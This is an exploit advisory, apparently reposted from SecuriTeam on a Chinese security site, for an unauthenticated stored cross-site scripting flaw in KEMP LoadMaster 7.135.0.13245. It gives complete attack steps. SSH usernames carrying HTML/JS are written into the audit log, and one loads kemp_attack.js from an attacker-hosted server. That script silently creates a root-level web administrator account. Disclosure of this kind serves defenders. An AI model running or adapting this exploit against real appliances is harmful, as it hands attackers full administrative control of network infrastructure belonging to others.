首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Ex
来源:http://www.securiteam.com/ 作者:SecuriTeam 发布时间:2017-05-31  
Vulnerability Summary
 
KEMP’s main product, the LoadMaster, is a load balancer built on its own proprietary software platform called LMOS, that enables it to run on almost any platform: As a KEMP LoadMaster appliance, a Virtual LoadMaster (VLM) deployed on HyperV, VMWare, on bare metal or in the public cloud. KEMP is available in Azure, where it is in the top 15 deployed applications as well as in AWS and VMWare vCloud Air.
 
A cross site scripting web vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest). A non authenticated user is able to inject his own malicious Javascript code into the system and use it to create a new web administrator user.
 
Vendor response
 
We were unable to get an update beyond this statement from the vendor: Expect a fix in our new version available Jan 2017.
 
Vulnerability Details
 
The issue is located in the System Configuration > System Log Files – View Audit LogFile section.
Once administrative access is obtained, the attacker can use it to execute arbitrary code.
 
Proof of Concept (PoC):
 
1 – Verify, in the victim machine the Audit LogFile (System Configuration > System Log Files): it is empty (Image 2)
 
2 – Inject simple HTML/JS code in the log page, using the ssh client: from an attacker machine open a shell and type the following code:
 
ssh \<button\ onclick\=alert\(1\)\>Click\ <\/button\>@10.0.8.145
 
3 – Let the login fail using wrong password (Image 4)
 
4 – Check again the log page (View Audit LogFile): as you can see the HTML/JS code has been correctly injected (Image 5)
 
Attack script:
 
1 – Start a web server and host on attack machine the following JS file (kemp_attack.js)
 
//BEGIN//////////////////////////////////////////////////////// openl = function(verb, url, data, target) {
var form = document.createElement("form"); form.action = url;
form.method = verb;
form.target = target || "_self";
if (data) {
for (var key in data) {
var input = document.createElement("textarea"); input.name = key;
input.value = typeof data[key] === "object" ?
JSON.stringify(data[key]) : data[key]; form.appendChild(input);
} }
form.style.display = 'none'; document.body.appendChild(form); form.submit();
};
//modify the target IP (10.0.8.145) and user/pass as necessary
openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru',pass:'GoSecure!',s:'Add+User'}, 'newWindow'); //modify the target IP as necessary, xuser must be equal to user. Increase the timeout (250) for debug setTimeout(function(){openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru',root:'1'}, 'newWindow');}, 250);
//modify the target IP as necessary. The timeout must be greater than the previous
setTimeout(function(){openl('', 'https://10.0.8.145/', '', 'newWindow');}, 500); //////////////////////////////////////////////////////////END//
 
2 – Verify permission of kemp_attack.js (chmod 644 kemp_attack.js)
 
3 – Verify users currently enabled in Kemp LoadMaster from System Configuration > User Management. As you can se no user (a part from default one) is active in the appliance (Image 8)
 
4 – Inject the attack code: from the attacker machine open a shell and type the following code:
 
ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\ </script>@10.0.8.145
 
5 – Check again the log page (View Audit LogFile): this will activate the script
 
6 – Check again the User Management page: a new user as been created with all permissions.
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft MsMpEng - Remotely E
·TerraMaster F2-420 NAS TOS 3.0
·TiEmu 2.08 - Local Buffer Over
·IBM Informix Dynamic Server /
·uc-http Daemon - Local File In
·ModX CMS Proof Of Concept Shel
·Octopus Deploy - Authenticated
·WebKit Document::prepareForDes
·CERIO DT-100G-N/DT-300N/CW-300
·WebKit JSC JSObject::ensureLen
·Google Chrome 60.0.3080.5 V8 J
·WebKit JSC emitPutDerivedConst
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved